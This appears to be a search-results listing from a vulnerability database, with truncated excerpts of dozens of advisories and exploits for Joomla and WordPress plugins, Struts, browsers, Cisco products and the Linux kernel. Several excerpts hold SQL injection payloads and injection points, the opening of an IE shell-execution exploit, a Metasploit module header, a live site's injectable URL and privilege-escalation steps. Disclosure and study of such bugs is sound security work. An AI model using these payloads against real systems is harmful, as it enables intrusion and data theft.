56796 matches found
Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
Joomla! Component JO Facebook Gallery v4. 5 - SQL Injection index. php id parameter into the SQL statement exist GET the type of injection Injection point: http://localhost/PATH/index. php? option=comjofacebookgallery&view=category&id=SQL http://localhost/PATH/index. php?...
S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
Based on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command. Sound detection methodthe detection method by the constant...
Joomla! Component JSP Store Locator v2.2 - SQL Injection
Joomla! Component JSP Store Locator v2. 2 - SQL Injection index. php id parameter into the SQL statement exist GET the type of injection Injection point: http://localhost/PATH/index. php? option=comjsplocation&task=directionview&id=SQL http://localhost/PATH/index. php?...
ohocms catid_user_save.php code execution vulnerability
No description provided by source...
Joomla! Component OneVote! v1.0 - SQL Injection
Joomla! Component OneVote! v1. 0 - SQL Injection results. in php electionid parameters into the SQL statement exist GET the type of injection Injection point: http://localhost/PATH/components/comonevote/results. php? electionid=SQL union injected payload: +/! 50000union/+select+@@version-- - Test...
Dahua backdoor Generation 2 and 3
I'm speechless, and almost don't know what I should write... I hardly can't believe what I have just found. I have just discovered to what I strongly believe is backdoor in Dahua DVR/NVR/IPC and possible all their clones. Since I am convinced this is a backdoor, I have my own policy to NOT notify...
seacms search.php code execution vulnerability
function parseIf$content if strpos$content,'if:'=== false return $content; else $labelRule = buildregx"if:.? .? end if","is"; $labelRule2="elseif"; $labelRule3="else"; pregmatchall$labelRule,$content,$iar; $arlen=count$iar0; $elseIfFlag=false; for$m=0;$mparseStrIf$strIf; $strThen=$iar2$m;...
WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting
Vulnerability information Vulnerability title: WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting Plugin home page: https://wordpress.org/plugins/corner-ad/ Affected Plugin version: 1.0.7 Test environment: Firefox 44, Windows10 Vulnerability details...
ohocms edittheme.php code execution vulnerability
No description provided by source...
Joomla component Recipe Manager v2. 2 parameter id SQL injection vulnerability
Joomla! Component Recipe Manager v2. 2 - SQL Injection Joomla! Component Recipe Manager v2. 2, The presence of the parameter filter is not strict, leading to a sql injection vulnerability, if the other server is turned on the error display, can be directly used Injection point:...
WordPress Plugin Mail Masta 1.0 - SQL Injection
Vulnerability information Vulnerability title: WordPress Plugin Mail Masta 1.0 - SQL Injection Plugin home page: https://wpcore.com/plugin/mail-masta Vulnerability type: SQL injection CVE : CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098 Vulnerability analysis The first injection...
IE Godmode remote code execution vulnerability, CVE-2014-6332)
No description provided by source. alliedve.htm // alliewin95+ie3-win10+ie11 dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 // function runmumaa On Error Resume Next set shell=createobject"Shell.Application" shell.ShellExecute...
Joomla! Component Abstract v2.1 - SQL Injection
Joomla! Component the Abstract v2. 1 - SQL Injection Joomla! Component the Abstract v2. 1, There is a parameter filter is not strict, leading to a sql injection vulnerability Injection point: http://localhost/PATH/index. php? option=comabstract&view=conferences&layout=detail&pid=SQL...
Wordpress < 4.7.1 - Username Enumeration (CVE-2017-5487)
Author: p0wd3r know Chong Yu 404 security lab Date: 2017-03-05 0x00 vulnerability overview Vulnerability description Recently exploit-db is published on a Wordpress 4.7.1 username enumeration vulnerabilities: , in fact, the vulnerability to 1-month 14, has been posted on the Internet, and given t...
2017 Visual Studio Code Workspace settings code execution
The following issue constitutes an arbitrary code execution vulnerability in Visual Studio Code herein referred to as "Code". Users should upgrade to Code 1.9.0 or later. says: Visual Studio Code is a source code editor developed by Microsoft for Windows, Linux and macOS. It includes support for...
Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
./ zen-mobile-app-native/server/images.php code for missing authentication Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder. Vulnerability: The code in the file ./ zen-mobile-app-native/server/images.php doesn't...
MDwiki <= v0.6.2 DomXSS Vulnerability
Originally thought just Tencent a site to achieve the problem, behind the Black brother reminded me to see the source code in the Github address, only to find that is open source MDwiki General system. (MDwiki is a completely using HTML5/Javascript technology to build, runs completely on the...
Cisco AnyConnect SBL 4.3.04027 Local Privilege Escalation (CVE-2017-3813)
Run CMD.EXE with system privileges 1. Start Cisco anyconnect from logon screen. 2. Once the Cisco app comes up where you can select a profile and hit connect hold CTRL and hit B. 3. When the Cisco about window appears then select the URL at the bottom. This will open Internet Explorer or you can...
WordPress plugin NextGEN Gallery SQL injection vulnerability
As part of a vulnerability research project for our Sucuri Firewall WAF, we have been auditing multiple open source projects looking for security issues. While working on the WordPress plugin NextGEN Gallery, we discovered a severe SQL Injection vulnerability. This vulnerability allows an...
Cisco ASA Remote Code Execution (CVE-2016-1287)
Remote Code Execution on Cisco ASA A year ago ExodusIntel disclosed a vulnerability affecting the IKE implementation in Cisco’s ASA products. The error is due to an overflow in the checking of reassembled IKE fragments, and allows remote code execution from an unauthenticated attacker. More...
Remote Code Execution as Root via ESET Endpoint Antivirus 6(CVE-2016-9892)
Introduction ============ Per ESET's online material, "ESET Endpoint Antivirus for OS X delivers award- winning cross-platform protection for multi-platform environments. It protects against malware and spyware and shields end users from fake websites phishing for sensitive information such as...
Yonyou FE collaborative Office system file_publish_open. jsp parameter id time delay injection
No description provided by source...
DokuWiki SSRF Security Bypass Vulnerability(CVE-2016-7964 )
I found a ssrf vulnerability in dokuwiki. The sendRequest method in HTTPClient ClassIn file: /inc/HTTPClient.php has no restrict to access private network, such as, 10.0.0.1/8, 172.16.0.0/12, 192.168.0.0/16. This allows user to scan port of internal network. For example, 1. edit any page in...
Zigaform - SQL injection vulnerability
Zigaform the modelforms. in php form parameters into SQL statements cause SQL injection Injection point: http://localhost/PATH/formbuilder/frontend/viewform/? form=SQL payload: AND SELECT 2120 FROMSELECT COUNT,CONCAT0x716a7a6271,SELECT ELT2120=2120,1,0x7171767071,FLOORRAND02,md5233x FROM...
Takas Classified 1.1 - SQL injection vulnerability
controllers/Classifiedads. php file subcatid and catid, the locid, the areaid, type, and post parameter into the SQL statement cause the SQL injection to produce SQL injection points: http://localhost/PATH/index. php/classifiedads/ads/?& subcatid=SQL http://localhost/PATH/index...
DokuWiki fetch.php SSRF vulnerability
Author: baolongniucow protection Dragon About DokuWiki DokuWiki is an open source wiki engine program, running on PHP environment. DokuWiki program small but powerful, flexible, suitable for small teams and personal web site Knowledge Base management. Vulnerability description DokuWiki latest...
Windows gdi32.dll heap-based out-of-bounds reads / memory disclosure (CVE-2017-0038)
In issue 757, I described multiple bugs related to the handling of DIBs Device Independent Bitmaps embedded in EMF records, as implemented in the user-mode Windows GDI library gdi32.dll. As a quick reminder, the DIB-embedding records follow a common scheme: they include four fields, spots denotin...
Microsoft Edge and IE: Type confusion in HandleColumnBreakOnColumnSpanningElement (CVE-2017-0037)
PoC: .class1 float: left; column-count: 5; .class2 column-span: all; columns: 1px; table border-spacing: 0px; function boom document.styleSheets0.media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; Note: The analysis below is based on an 64-bit IE running in single process mode running...
Chrome: bypass for download filetype blacklist, extension->native privesc
This bug report describes a vulnerability that can be used by an extension with some permissions to escalate to native code execution on Linux desktops if Java is installed. No user interaction is required. Chrome permits extensions with appropriate permissions "downloads" and "downloads. open" t...
FireFox RCE by chaining small bugs
The Main Bug The main bug that made this possible was a strange behavior where 'javascript:' URLs coming from bookmarks were turning into chrome windows after a refresh occurs. This gave me my first chance at potentially injecting arbitrary chrome code, achieving that would mean I have an RCE!...
Android: pointer leak via insufficient binder message verification
When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string doesn't overlap with any byte range that was tagged as a binder object by the sender. When an attacker sends a parcel to a victim process that contains an unexpected binder handle...
Icdcprague Sqli Vulnerability
DEMO http://www.icdcprague.org/index.php?id=10 Vuln Page index.php?id=10...
MS16-104: Internet Explorer URL files Security Feature Bypass (CVE-2016-3353)
On September 13th, 2016 Microsoft released security bulletin MS16-104 1, which addresses several vulnerabilities affecting Internet Explorer. One of those vulnerabilities is CVE-2016-3353, a security feature bypass bug in the way .URL files are handled. This security issue does not allow for remo...
HotelCMS with Booking Engine - SQL injection vulnerability
http://localhost/PATH/locale? locale=SQL the locale parameter there is sql injection Wherein the error injection as follows: payload: http://localhost/PATH/locale? locale=1' AND SELECT 3507 FROMSELECT COUNT,CONCATFLOORRAND02,md5233x FROM INFORMATIONSCHEMA. The PLUGINS GROUP BY xa-- Lilt Test...
Shutter user-assisted remote code execution
Description. /usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote attackers to execute arbitrary commands via a crafted image name that is mishandled during a "Run a plugin" action. 2. Proof of concept. 1 Rename an image to something like "$firefox" 2 Open the renamed file in...
Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (CVE-2016-6433)
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",...
macOS HelpViewer XSS leads to arbitrary file execution and arbitrary file read(CVE-2017-2361)
HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help...
Apple WebKit: Bypass pop-up blocker via cross-origin or sandboxed iframe (CVE-2017-2371)
The second argument of window.open is a name for the new window. If there's a frame that has same name, it will try to load the URL in that. If not, it just tries to create a new window and pop-up. But without the user's click event, its attempt will fail. Here's some snippets. RefPtr...
Adobe Flash: Use-after-free in applying bitmapfilter (CVE-2017-2985)
No description provided by source. poc 附件下载链接:https://bugs.chromium.org/p/project-zero/issues/attachment?aid=260843...
Adobe Flash: Heap Overflow in YUVPlane decoding (CVE-2017-2986)
The attached FLV file causes a heap overflow in YUVPlane decoding. To reproduce, put LoadMP4. swf and yuvplane. flv on a server, and visit 127.0.0.1/LoadMP4. swf? file=yvplane. flv. Attachment: yuvplane. flv LoadMP4. swf...
Apple WebKit: UXSS via Frame::setDocument (CVE-2017-2365)
Here's a snippet of Frame::setDocument. void Frame::setDocumentRefPtr&& newDocument ASSERT!newDocument || newDocument-frame == this; if mdoc && mdoc-pageCacheState != Document::InPageCache mdoc-prepareForDestruction; mdoc = newDocument.copyRef; ... Before setting |mdoc| to |newDocument|, it calls...
Apple WebKit: UXSS via FrameLoader::clear (CVE-2017-2363)
When the new page is loading, FrameLoader::clear is called to clear the old document and window. Here's a snippet of FrameLoader::clear. void FrameLoader::clearDocument newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView ... // Do this after detaching the documen...
Linux kernel DCCP double-free vulnerability(CVE-2017-6074)
This is an announcement about CVE-2017-6074 1 which is a double-free vulnerability I found in the Linux kernel. It can be exploited to gain kernel code execution from an unprivileged processes. Fixed on Feb 17, 2017:...
Android Arbitrary class loading and instantiation in protobuf parcelable "javanano" compiler
The protobuf library includes the "javanano" compiler, commonly used in many Android applications due to its tiny resource footprint. The "javanano" compiler supports a variety of Android-specific compilation flags which can be used to modify the generated message classes. One such compilation fl...
Google Chrome: out-of-bound read in layout
Chrome bug: https://bugs.chromium.org/p/chromium/issues/detail?id=671328 PoC: content contain: size layout; function leak document.execCommand"selectAll"; opt.text = ""; aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Infoleak is demonstrated in th...
Axessh 4.2 - Denial Of Service
Axessh是一款windows下的ssh工具,使用后会开启ssh 22端口,并开启wsshed.exe服务,当wsshed.exe在接收字符串时,会调用BIGNUM相关函数进行处理,但对于BIGNUM的结构体没有进行赋初值,导致空指针引用引发拒绝服务漏洞,下面对此漏洞进行详细分析。 这里要提的一点是,Exploit-db给的PoC可以触发漏洞,但实际上,只要连接22端口,都会引发这个漏洞的发生,哪怕只发送一字节的内容。 附加wsshed.exe,执行PoC,引发中断,这边捕获到漏洞触发位置。 0:000 g f74.a68: Access violation - code c00000...
QEMU: virtfs permits guest to access entire host filesystem (CVE-2016-9602)
If an attacker can execute arbitrary code in the guest kernel and a virtfs is set up, the attacker can access the entire filesystem of the host using a symlink attack. This might require the security model "passthrough" or "none" - I haven't tested with the mapped modes. Repro steps: 1. Place som...
The green Alliance Web application firewall arbitrary command execution vulnerability
Green UNITA, Web application firewall, NSFOCUS Web Application Firewall, also known as Web application protection system, referred to as WAF is a green Union company Research and development of Web Security Products. The green Alliance Web application firewall there is an arbitrary command...
74cms at the front Desk The type parameter template engine injection vulnerability
This is a service end template injection vulnerabilities. Application/Home/Controller/MController.class.php apply'Mobile' redirectbuildmobileurl; $type = I'get. type','android','trim'; $androiddownloadurl = C'qscmsandroiddownload'? C'qscmsandroiddownload':"; $iosdownloadurl = C'qscmsiosdownload'?...
D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure
No description provided by source...